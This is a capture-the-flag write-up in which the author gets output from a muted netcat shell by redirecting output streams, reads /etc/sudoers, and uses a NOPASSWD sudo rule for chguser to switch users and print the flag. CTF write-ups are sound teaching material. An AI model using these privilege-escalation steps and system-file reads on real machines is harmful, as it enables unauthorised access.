Truly Terrible Why

Table of Contents

Be Careful with Sudo!

Problem

Your friend gave you a remote shell to his computer and challenged you to get in, but something seems a little off… The terminal you have seems almost like it isn’t responding to any of the commands you put in! Figure out how to fix the problem and get into his account to find the flag! Note: networking has been disabled on the remote shell that you have. Also, if the problem immediately kicks you off after typing in one command, it is broken. Please let the organizers know if that happens.

nc 52.205.246.189 9000

Solution (Unintended)

This is an unintended solution and confirmed with the author!

A hint was given: Think about program I/O on linux

I/O Redirection

I redirect the stdout to stdinalso the terminal):

cat /etc/sudoers 1>&0 2>&0

like this.

Sudo

In order to got the flag, I need to change into another user, and I need a sudo. But sudo needs a working pty…

BUT ACTUALLY I DON’T NEED IT!!!! The author unintentionally left chguser with NOPASSWD

problem-user ALL = (root) NOPASSWD: /usr/bin/chguser

Result

  ~ nc 52.205.246.189 9000
Imagine having a usable terminal...
cat /etc/sudoers 1>&0 2>&0
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults        env_reset
Defaults        mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root    ALL=(ALL:ALL) ALL

# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL

# Allow members of group sudo to execute any command
%sudo   ALL=(ALL:ALL) ALL

# See sudoers(5) for more information on "#include" directives:

#includedir /etc/sudoers.d
problem-user ALL = (root) NOPASSWD: /usr/bin/chguser
sudo chguser other-user 1>&0 2>&0
sudo: unable to resolve host ctf-challenge: Resource temporarily unavailable
cd ~/flag/ 1>&0 2>&0
ls 1>&0 2>&0
flag.txt
cat flag.txt 1>&0 2>&0
tjctf{ptys_sure_are_neat}

Trivia

1

2

3

Nemo Xiong avatar
Nemo Xiong
ex-Cybersecurity Executor, now a student in Unimelb
comments powered by Disqus